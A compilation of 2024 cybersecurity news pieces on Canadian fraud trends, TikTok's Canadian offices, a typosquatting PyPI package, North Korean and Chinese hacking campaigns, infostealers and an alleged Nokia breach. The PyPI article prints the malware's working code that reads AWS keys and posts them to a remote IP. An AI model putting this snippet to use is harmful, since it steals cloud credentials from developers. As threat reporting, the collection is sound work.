PRESS RELEASE

TORONTO, Oct. 30, 2024 /PRNewswire/ -- In 2024, Canadian banks have seen just 34% of the reported fraud cases they experienced a year ago. And yet, Canadian retail banking customers appear on pace to lose as much as or more than the $569 million they lost to fraud in 2023 (triple what they lost in 2021). BioCatch – the global leader in digital fraud detection and financial crime prevention powered by behavioral biometric intelligence – says these findings suggest fraudsters have altered their strategies, honing attacks to target fewer Canadians for more money per scam.

"While fraud volumes have decreased significantly over the last year, we're observing an increase in the average value of these cases," BioCatch Director of Global Fraud Intelligence Tom Peacock said. "We can attribute much of this to the rise in social engineering scams in Canada, particularly impersonation scams, which are notoriously higher value than other fraud types. More than 70% of impersonation scam losses in Canada originate from five-figure cases, greatly boosting the country's scam-loss average."

BioCatch's 2024 Digital Banking Fraud Trends in Canada report, also highlights that most Canadian fraud victims are now ages 20-49 instead of 50-89, debunking the common misconception that older people provide easier and more lucrative targets.

"Artificial Intelligence is super-charging fraud," BioCatch Global Advisory Director Seth Ruden said, "compounding its impact, and allowing bad actors to scale and sophisticate their scams with deepfakes and other devices. As the industry deploys the newest authentication methods in both account opening and account takeover processes, fraudsters will undoubtedly attack these as well."

BioCatch also found one in seven scam sessions in Canada showed signs of remote access trojans (RAT), whether active RAT (where the fraudster tricks the victim into granting them control of the session so they can execute the fraud themselves) or passive RAT (where the fraudster guides the victim through payment process).

Click here to access BioCatch's complete 2024 Digital Banking Fraud Trends in Canada report.

BioCatch fraud prevention experts Tom Peacock and Seth Ruden will hold a live conversation about the growth of social engineering scams in Canada and the other latest fraud trends in the country on Nov. 14. To register for that exclusive session, click here.

About BioCatch:

BioCatch stands at the forefront of digital fraud detection, pioneering behavioral biometric intelligence grounded in advanced cognitive science and machine learning. BioCatch analyzes thousands of user interactions to support a digital banking environment where identity, trust, and ease coexist. Today, 32 of the world's largest 100 banks and 210 total financial institutions rely on BioCatch Connect™ to combat fraud, facilitate digital transformation, and grow customer relationships. BioCatch's Client Innovation Board – an industry-led initiative featuring American Express, Barclays, Citi Ventures, HSBC, and National Australia Bank – collaborates to pioneer creative and innovative ways to leverage customer relationships for fraud prevention. With more than a decade of data analysis, 92 registered patents, and unmatched expertise, BioCatch continues to lead innovation to address future challenges. For more information, please visit www.biocatch.com.

Canadians Expected to Lose More Than $569M to Scams in 2024

Questions remain over what a corporate ban will achieve, since Canadians will still be able to use the app.

Source: SOPA Images Limited via Alamy Stock Photo

ByteDance is being exiled from Canada, though the TikTok app is not.

Following the US's example, Canada has spent recent years rubbing up against the world's most popular Chinese app. In February 2023, TikTok was banned from all government devices, citing security concerns. Later that year, the government called for a broader national security review under the 1985 Investment Canada Act, which empowers the government to scrutinize foreign investments.

In concluding that review, the minister of Innovation, Science and Economic Development Canada (ISED) — a federal agency responsible for regulating and supporting various aspects of the country's economy, industry, and scientific endeavors — unveiled a significant, though not comprehensive, development in his country's approach.

To address "specific national security risks," the minister said yesterday, the offices of TikTok Technology Canada Inc. — the Canadian subsidiary of ByteDance, TikTok's parent company — must now be shuttered. However, he noted, the government will not actually block any Canadians from using the app, as "the decision to use a social media application or platform is a personal choice."

**TikTok vs. Governments**

Ever since TikTok blew up during the COVID-19 pandemic, governments worldwide have struggled with how to administer: Ban it, to the chagrin of millions, or don't, and risk consequences to mass privacy and national security.

Concern is widespread that the Chinese Communist Party (CCP) could conduct data gathering and spying through TikTok, since it wields potentially unlimited authority over Chinese companies. And "The CCP has long been known for having an enormous capability to gather otherwise benign-looking datasets, and to process them to produce intelligence to further its national interests," notes Casey Ellis, founder and adviser at Bugcrowd. "While it can easily be argued that Western governments and companies are capable of the same, the CCP's national interests are at best competitive, and at worst disruptive to the national interests of the West."

Blocking the app to prevent CCP data gathering is controversial, however, since it's massively popular, and there is no definitive, significant proof of such malicious activity to date. A few scattered countries have done so (for varying reasons), most notably India in 2020, but most have taken up solutions somewhere in the middle.

In 2020, President Trump signed executive orders effectively forcing ByteDance to sell TikTok to an American company, or else face a national ban. President Biden's No TikTok on Government Devices Act banned the app in government settings, and his Protecting Americans from Foreign Adversary Controlled Applications Act carried the forced sale idea from the Trump administration. US policy is likely to subside now that Trump has been elected again. "Trump has made strong moves against ByteDance in the past," Ellis notes. "He has a reputation for being tough on China, and for operating on the assumption that China is competitive to the US as a great power. I think we'll see more activity around addressing 'creeping threats' from ByteDance and other Chinese companies, particularly those with a larger and established presence, both in the US and amongst its allies, over the coming year."

Meanwhile, in 2023, the Canadian government took parallel actions. And just as it had in the US, TikTok says it will challenge Canada's latest ruling in court.

**What Would Actually Solve TikTok Privacy?**

Debate has now begun over whether banning the corporate half of the TikTok operation will be helpful, if not abjectly harmful to Canada's national security aims.

As Canadian academic Michael Geist argued in a blog post, "banning the company rather than the app may actually make matters worse since the risks associated with the app will remain but the ability to hold the company accountable will be weakened," since it will no longer have a domestic presence. "It is hard to envision it prioritizing (or perhaps even complying) with Canadian regulatory processes if it is banned from formally operating in the jurisdiction."

Dark Reading has asked the ISED for its view of how the ban will benefit Canadian national security. This article will be updated when ISED's response is received.

A separate development poised to directly affect TikTok data collection in Canada is the legislation C-27, which would supersede the Personal Information Protection and Electronic Documents Act, Canada's primary privacy legislation since 2000.

C-27 packages three separate Acts: the Consumer Privacy Protection Act, the bit most relevant for TikTok user privacy; the Electronic Documents Act; and the Artificial Intelligence and Data Act. Though it may be viewed as efficient and ambitious to address so many issues at once, ongoing debates primarily around the artificial intelligence component are currently holding up the passage of the other two along with it.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Canada Closes TikTok Offices, Citing National Security

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years

We have great news to share: Malwarebytes has acquired AzireVPN, a privacy-focused VPN provider.

Today I have great news to share: We’ve acquired AzireVPN, a privacy-focused VPN provider based in Sweden. 

I wanted to share with you our intentions behind this exciting step, and what this means for our existing users and the family of solutions they rely on to keep them private and secure. 

Malwarebytes has long been an advocate for user privacy (think Malwarebytes Privacy VPN and our free web extension Malwarebytes Browser Guard). Now, we’re leaning even more on our mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.  

With AzireVPN’s infrastructure and intellectual property, Malwarebytes is poised to develop more advanced VPN technologies and features, offering increased flexibility and enhanced security for our users. 

**Why AzireVPN?** 

AzireVPN is renowned for its robust security standards and privacy-first commitment. Here are two examples of what the company does to support that: 

*   AzireVPN physically owns and controls all of its dedicated and diskless servers—a practice Malwarebytes is committed to continuing.  

*   The company developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.  

**What does this mean for existing Malwarebytes Privacy VPN customers?** 

There are no changes for Malwarebytes Privacy VPN customers at this time. They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.  

**What does this mean for existing AzireVPN customers?** 

AzireVPN customers will also continue to enjoy the same privacy-focused VPN service – no logs, no data collection, no bandwidth limitations. There will continue to be no requirement to share any information to sign up for the service.   

**An exciting future is ahead of us** 

We’ll share more details on our future VPN offering in the coming months.  

I’m so excited about our future. This is yet another milestone for Malwarebytes, underscoring our commitment to privacy and a free and open internet.  

Thanks for putting your trust in us to protect you.

 Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities  

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how…

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how this stealthy attack works, the techniques used, and how to protect yourself from this growing threat.

North Korean state-sponsored APT group ‘**BlueNoroff**‘ is targeting crypto-related businesses in a campaign dubbed ‘Hidden Risk’, according to SentinelOne’s findings shared with Hackread.com. 

SentinelLabs’ threat researchers reportedly discovered that BlueNoroff, a subgroup of the larger North Korean state-backed **Lazarus Group**, is targeting cryptocurrency and DeFi businesses using use email and PDF-based lures with fake news headlines/crypto-related stories in a campaign that began in July 2024.

Examples of fake news, posts and announcements used in the attack (Via SentinelOne)

****Analyzing the Attack****

Researchers noted that attackers have employed unique tactics to evade detection and compromise victim systems. The attack begins with a **well-crafted phishing email** that lures unsuspecting victims into clicking on a malicious link that leads to a seemingly legitimate PDF document, which is actually hiding a malicious Swift-language-based Mac application cleverly disguised as a PDF reader (signed/notarized on 19 October 2024).

“The application is disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”,” researchers **explained**.

Once executed, this application discreetly downloads a decoy PDF (Hidden Risk) and then downloads/executes a malicious x86-64 binary (“growth”) on both Intel and Apple silicon machines. 

Growth installs itself persistently and acts as a backdoor. It gathers sensitive information about the infected system, communicates with a remote server controlled by the attackers, and can potentially receive and execute commands.

****Persistence Mechanism****

To ensure persistence, the attackers have opted for a unique method of modifying the Zsh configuration file (zshenv) by adding malicious code to ensure its continued presence. This is a critical file used by the Zsh shell and is sourced during every Zsh session, allowing the backdoor to automatically execute upon system startup, even after a reboot.

****The BlueNoroff Connection****

SentinelLabs’ researchers have linked this campaign with BlueNoroff because it resembles techniques from their past campaigns, including parsing server commands and saving them in hidden files. The campaign’s network infrastructure analysis also reveals connections to domains used in previous campaigns using services like **NameCheap** and Quickpacket for hosting.

Furthermore, the malware uses a User-Agent string previously linked to BlueNoroff’s “**RustBucket**” malware and exploits a developer account to get their malware notarized by Apple, bypassing security measures like **Gatekeeper**.

****Staying Protected****

BlueNoroff has a history of targeting cryptocurrency exchanges, venture capital firms, and banks and poses a constant threat to the industry. They prefer using PDF-based lures mainly because PDF documents are widely used and trusted, making them ideal for malicious payloads.

Hackread recently **reported** BlueNoroff-linked malware, TodoSwift, disguised as a legitimate PDF viewer and ObjCShellz malware **targeting macOS** to run remote shell commands on Intel and Arm Macs.

Therefore, it is important to double-check email addresses, watch out for emails from anonymous sources, and avoid clicking on links in unknown emails, especially if they ask for downloading applications/PDFs. MacOS users must remain aware of risks given the sudden rise in **macOS-oriented attacks**.

1.  **Fake North Korean IT Workers Infiltrate Western Firms**
2.  **North Korean Hackers Team Up with Play Ransomware**
3.  **N Korean hackers stole $1.7 billion from crypto exchanges**
4.  **North Korean Hackers Drop Linux Malware for ATM Cashouts**
5.  **SnatchCrypto attack hits DeFi, Blockchain Firms with backdoor**

North Korean Hackers Use Fake News to Spread ‘Hidden Risk’ Malware

An ongoing phishing campaign is employing copyright infringement-related themes to trick victims into downloading a newer version of the Rhadamanthys information stealer since July 2024.
Cybersecurity firm Check Point is tracking the large-scale campaign under the name CopyRh(ight)adamantys. Targeted regions include the United States, Europe, East Asia, and South America.
"The campaign

An ongoing phishing campaign is employing copyright infringement-related themes to trick victims into downloading a newer version of the Rhadamanthys information stealer since July 2024.

Cybersecurity firm Check Point is tracking the large-scale campaign under the name **CopyRh(ight)adamantys**. Targeted regions include the United States, Europe, East Asia, and South America.

"The campaign impersonates dozens of companies, while each email is sent to a specific targeted entity from a different Gmail account, adapting the impersonated company and the language per targeted entity," the company said in a technical analysis. "Almost 70% of the impersonated companies are from the Entertainment /Media and Technology/Software sectors."

The attacks are notable for the deployment of version 0.7 of the Rhadamanthys stealer, which, as detailed by Recorded Future's Insikt Group early last month, incorporates artificial intelligence (AI) for optical character recognition (OCR).

The Israeli company said the activity overlaps with a campaign that Cisco Talos disclosed last week as targeting Facebook business and advertising account users in Taiwan to deliver Lumma or Rhadamanthys stealer malware.

The attack chains are characterized by the use of spear-phishing tactics that entail sending email messages claiming purported copyright violations by masquerading as well-known companies.

These emails are sent from Gmail accounts and claim to be from legal representatives of the impersonated companies. The contents of the message accuse the recipients of misusing their brand on social media platforms and request them to remove the concerned images and videos.

"The removal instructions are said to be in a password-protected file. However, the attached file is a download link to appspot.com, linked to the Gmail account, which redirects the user to Dropbox or Discord to download a password-protected archive (with the password provided in the email)," Check Point said.

The RAR archive contains three components, a legitimate executable vulnerable to DLL side-loading, the malicious DLL containing the stealer payload, and a decoy document. Once the binary is run, it sideloads the DLL file, which then paves the way for the deployment of Rhadamanthys.

Check Point, which attributed the campaign to a likely cybercrime group, said that it's possible the threat actors have utilized AI tools given the scale of the campaign and the variety of the lures and sender emails.

"The campaign's widespread and indiscriminate targeting of organizations across multiple regions suggests it was orchestrated by a financially motivated cybercrime group rather than a nation-state actor," it said. "Its global reach, automated phishing tactics, and diverse lures demonstrate how attackers continuously evolve to improve their success rates."

**New SteelFox Malware Exploits Vulnerable Driver**

The findings come as Kaspersky shed light on a new "full-featured crimeware bundle" dubbed SteelFox that's propagated via forums posts, torrent trackers, and blogs, passing off as legitimate utilities like Foxit PDF Editor, JetBrains, and AutoCAD.

The campaign, dating back to February 2023, has claimed victims across the world, particularly those located in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka. It has not been attributed to any known threat actor or group.

"Delivered via sophisticated execution chains including shellcoding, this threat abuses Windows services and drivers," security researcher Kirill Korchemny said. "It also uses stealer malware to extract the victim's credit card data as well as details about the infected device."

The starting point is a dropper app that impersonates cracked versions of popular software, which, when executed, asks for administrator access and drops a next-stage loader that, in turn, establishes persistence and launches the SteelFox DLL.

The admin access is subsequently abused to create a service that runs an older version of WinRing0.sys, a hardware access library for Windows that's vulnerable to CVE-2020-14979 and CVE-2021-41285, thereby allowing the threat actor to obtain NT\\SYSTEM privileges.

"This driver is also a component of the XMRig miner, so it is utilized for mining purposes," Korchemny noted. "After initializing the driver, the sample launches the miner. This represents a modified executable of XMRig with junk code fillers. It connects to a mining pool with hardcoded credentials."

The miner, for its part, is downloaded from a GitHub repository, with the malware also initiating contact with a remote server over TLS version 1.3 to exfiltrate sensitive data from web browsers, such as cookies, credit card data, browsing history, and visited places, system metadata, installed software, and timezone, among others.

"Highly sophisticated usage of modern C++ combined with external libraries grant this malware formidable power," Kaspersky said. "Usage of TLSv1.3 and SSL pinning ensures secure communication and harvesting of sensitive data."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SteelFox and Rhadamanthys Malware Use Copyright Scams, Driver Exploits to Target Victims

The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region.
"During this attack, the threat actor used as a lure the upcoming World Expo, which will be held in 2025 in Osaka, Japan," ESET said in its APT Activity Report for the period April to

Threat Intelligence / Cyber Espionage

The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an entity in the region.

"During this attack, the threat actor used as a lure the upcoming World Expo, which will be held in 2025 in Osaka, Japan," ESET said in its APT Activity Report for the period April to September 2024.

"This shows that even considering this new geographic targeting, MirrorFace remains focused on Japan and events related to it."

MirrorFace, also tracked as Earth Kasha, is assessed to be part of an umbrella group known as APT10, which also comprises clusters tracked as Earth Tengshe and Bronze Starlight. It's known for its targeting of Japanese organizations at least since 2019, although a new campaign observed in early 2023 expanded its operations to include Taiwan and India.

Over the years, the hacking crew's malware arsenal has evolved to include backdoors such as ANEL (aka UPPERCUT), LODEINFO and NOOPDOOR (aka HiddenFace), as well as a credential stealer referred to as MirrorStealer.

In the latest attack detected by the Slovak cybersecurity company, the victim was sent a spear-phishing email containing a link to a ZIP archive ("The EXPO Exhibition in Japan in 2025.zip") hosted on Microsoft OneDrive.

Image Source: Trend Micro

The archive file included a Windows shortcut file ("The EXPO Exhibition in Japan in 2025.docx.lnk") that, when launched, triggered an infection sequence that ultimately deployed ANEL and NOOPDOOR.

"ANEL disappeared from the scene around the end of 2018 or the start of 2019, and it was believed that LODEINFO had succeeded it, appearing later in 2019," ESET said. "Therefore, it is interesting to see ANEL resurfacing after almost five years."

The development comes as threat actors affiliated with China, like Flax Typhoon, Granite Typhoon, and Webworm, have been found to be increasingly relying on the open-source and multi-platform SoftEther VPN to maintain access to victims' networks.

It also follows a report from Bloomberg that said the China-linked Volt Typhoon breached Singapore Telecommunications (Singtel) as a "test run" as part of a broader campaign targeting telecom companies and other critical infrastructure, citing two people familiar with the matter. The cyber intrusion was discovered in June 2024.

Telecommunication and network service providers in the U.S. like AT&T, Verizon, and Lumen Technologies have also become the target of another Chinese nation-state adversarial collective called Salt Typhoon (aka FamousSparrow and GhostEmperor).

Earlier this week, The Wall Street Journal said the hackers leveraged these attacks to compromise cellphone lines used by various senior national security, policy officials, and politicians in the U.S. The campaign is also alleged to have infiltrated communications providers belonging to another country that "closely shares intelligence with the U.S."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait

The Canadian government on Wednesday ordered ByteDance-owned TikTok to dissolve its operations in the country, citing national security risks, but stopped short of instituting a ban on the popular video-sharing platform.
"The decision was based on the information and evidence collected over the course of the review and on the advice of Canada's security and intelligence community and other

National Security / Social Media

The Canadian government on Wednesday ordered ByteDance-owned TikTok to dissolve its operations in the country, citing national security risks, but stopped short of instituting a ban on the popular video-sharing platform.

"The decision was based on the information and evidence collected over the course of the review and on the advice of Canada's security and intelligence community and other government partners," François-Philippe Champagne, Minister of Innovation, Science and Industry, said in a statement.

The government said it does not intend to block Canadians' access to the app itself or curtail their ability to create new content, stating the use of a social media application is a "personal choice." The use of the app has already been banned on Canadian government devices since February 2023.

That having said, it urged Canadians to adopt good cyber security practices and assess the possible risks that could arise from using social media platforms, specifically regarding how their information is secured, managed, used, and shared by foreign actors.

Furthermore, the government said the order to wind up TikTok's business was made in accordance with the Investment Canada Act, which "allows for the review of foreign investments that may be injurious to Canada's national security."

In a statement shared with the Associated Press, the company said the shutdown of its Canadian offices would eliminate hundreds of local jobs, and that it intends to challenge the order in court.

TikTok, which is owned by China's ByteDance, has raised concerns in the U.S. that the service could be compelled by Beijing to hand over data of TikTok's U.S. consumers through domestic national security laws that require organizations to assist with intelligence gathering.

These worries prompted the U.S. government to sign a law that gives ByteDance until January 19, 2025, to divest TikTok or risk a ban in the country. TikTok sued in U.S. federal court in May, seeking to block the law.

While the company has long maintained that it doesn't share data with the Chinese government, it has faced a complete blockade in several countries, including Afghanistan, India, Nepal, and Pakistan. The use of the app is also prohibited on government-issued devices across several countries globally.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns

Attackers are triggering victims' deep-seated fear of getting in trouble in order to spread the sophisticated stealer across continents.

Source: Charles Walker Collection via Alamy Stock Photo

Hundreds of companies worldwide have been targeted with spear-phishing emails claiming copyright infringement that actually deliver an infostealer.

Starting in July, Check Point Research began to track the emails as they spread across the Americas, Europe, and Southeast Asia, coming from a new domain each time. Hundreds of its customers have been targeted, indicating that the real reach of the campaign may be far greater still.

The goal of the emails is to bait guilt-riddled victims into downloading Rhadamanthys, a sophisticated infostealer equally capable of pilfering nation-state intelligence or, in this case, cryptocurrency wallet passphrases.

**CopyR(ight)hadamantys**

No two emails in the campaign that researchers have dubbed "CopyR(ight)hadamantys" come from the same address, indicating that there must be some kind of automation behind their distribution. This automation proves awkward in some circumstances — like when an Israeli target receives an email almost entirely in Korean — and limits the emails' ability to realistically impersonate known brands.

Each one is made to seem as if it came from legal representatives of specific, known companies. Nearly 70% of those companies come from either technology — like Check Point itself — or from media and entertainment industries.

The profile of impersonated brands weaves in neatly with the story the attackers peddle: that recipients have posted some sort of content on social media that violated a copyright. "I assume everyone has done it to some degree in his life," says Sergey Shykevich, threat intelligence group manager at Check Point. "It just makes people hesitate and think, 'Oh, did I use some wrong image? Did I copy some text \[by accident\]?' Even if you didn't."

Recipients are asked to remove specific images and videos, the details of which are contained in a password-protected file. The file is actually a link that redirects the user to download an archive from Dropbox or Discord. The archive contains a decoy document, a legitimate executable, and a malicious dynamic link library (DLL) containing the Rhadamanthys stealer.

**What to Know About Rhadamanthys**

Rhadamanthys is a popular and accomplished information stealer. As Shykevich explains, "It's without any doubt the most sophisticated of those infostealers which are sold as commodity malware in the Dark Web. It's more expensive than other infostealers: Mostly you'll rent other infostealers from between $100 to $200. Rhadamanthys is more, around $1,000. It's much more modular, more obfuscated, and more complicated in how it's built: The way it loads itself, hides itself, all this makes detection much more complicated."

Among other features, the newest Rhadamanthys version 0.7 sports a slightly archaic machine-learning-based optical character recognition (OCR) component. It's hardly advanced artificial intelligence (AI) — it struggles with text in mixed colors, can't read handwriting, and only interprets the most popular fonts. Nonetheless, it helps the malware read data from static documents (like PDFs) and images.

In CopyR(ight)hadamantys, the OCR module comes loaded with a dictionary of 2,048 words associated with Bitcoin wallet protection codes. This might suggest that the attackers are after cryptocurrencies, which, if true, would also align with the campaign's broad targeting, characteristic of financially motivated campaigns. In recent months, Rhadamanthys has also been associated with nation-state threat actors like Iran's Void Manticore, and the pro-Palestine group "Handala."

**One Strange Stealth Feature**

Organizations looking to defend against CopyR(ight)hadamantys should start with phishing protections, but there's another quirk of the campaign worth noting as well.

After making landfall, the malicious DLL writes a significantly larger version of itself to the victim computer's Documents folder, which masquerades as a component of Firefox. This version of the file is functionally equivalent to the first. What makes it so much heavier is an "overlay" — useless data that serves two meta-functions. First, it changes the file's hash value, a common means by which antivirus programs identify malware.

Some antivirus programs also avoid scanning extra large files. "For example, they don't want to run files associated with games, with a huge number of gigabytes, because it makes for an intense load," Shykevich explains. By this logic, an otherwise uselessly larger Rhadamanthys file might improve its chances of avoiding detection. Though, he adds, "It's not extremely common because it's also not convenient for the attackers to deal with huge files. With some email solutions, you can't attach files more than 20MB, so you need to send the victim to some external resource. So it's a tactic, but it's not some crazy tactic that always works."

Organizations might want to sniff out at any particularly large files that employees may be downloading from emails. "It's not easy, because there are many reasons why some legitimate files will be big," he says. "But I think it's possible to implement some \[effective\] rules for what you can download."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Fake Copyright Infringement Emails Spread Rhadamanthys

The mobile device maker continues to investigate IntelBroker's claims of another high-profile data breach, with the cybercriminal group posting on BreachForums internal data allegedly stolen from Nokia through a third-party contractor.

Source: Nico El Nino via Alamy Stock Photo

Nokia is investigating an alleged cyberattack in which threat actors claim to have stolen sensitive internal data. However, the company says that so far there is no evidence that either its data or systems were affected by a breach.

Known threat actor IntelBroker on Tuesday posted what it claimed is Nokia's online internal data — including SSH keys, source code, and internal credentials — putting it up for sale on the BreachForums cybercrime site for $20,000, according to a published report on HackRead.

The group claimed to have obtained the data through a breach of a third-party contractor linked to Nokia’s internal tool development, though no customer data seems to have been affected by the breach, according to the report.

"Nokia is aware of reports that an unauthorized actor has alleged to have gained access to certain third-party contractor data and possibly data of Nokia," a Nokia spokesperson tells Dark Reading. "Nokia takes this allegation seriously and we are investigating."

However, at this time, the company's investigation "has found no evidence that any of our systems or data being impacted," though Nokia continues "to closely monitor the situation," the spokesperson says.

**Group Known for High-Profile Data Heists**

Given that IntelBroker is a notorious threat actor that already has pulled off a series of high-profile data heists, the chance that Nokia eventually will find that its data has been stolen seems likely. The Serbian-based entity began operations in 2022 and is linked to data breaches that affected Apple, the US House of Representatives, Europol, General Electric, and DARPA (Defense Advanced Research Projects Agency).

If IntelBroker's claim turns out to be true, data stolen in the heist and then sold to a malicious actor or actors potentially could be used to engage in other cybercriminal activity against Nokia. For example, stolen using credentials to gain unauthorized access to Nokia systems and breach other sensitive data or propagate malware. Depending on the nature of the data, other organizations also could be at risk.

The incident also demonstrates yet another example of how organizations are exposed to security risks through third-parties that contract with the company, observes Jim Routh, chief trust officer at cybersecurity firm Saviynt. However, that the breach itself occurred through a third party is not a huge surprise, he tells Dark Reading via email.

**Mitigating Third-Party Risk**

In fact, numerous high-profile cyberattacks at global multinational organizations have been the result of breaches through third parties, including incidents that occurred at credit card company American Express, Spanish banking institution Santander, and US-based financial organization Bank of America.

However, Routh says that the alleged Nokia breach "represents a bit of a head-scratcher" because it involves the compromise of "third-party credentials for access to the software supply chain."

"The head-scratching comes from why a third party has access to Nokia source code," he notes. However, it's possible that attackers gained access through a software engineer contributing to an internal project, Routh adds, speculating that hackers exploited "credential management for access to the software build process."

One potential way that organizations can protect themselves from a similar incident, he says, is to improve identity management for cloud accounts with access to the software supply chain to avoid inadvertently exposing sensitive data to threat actors.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Tag

#intel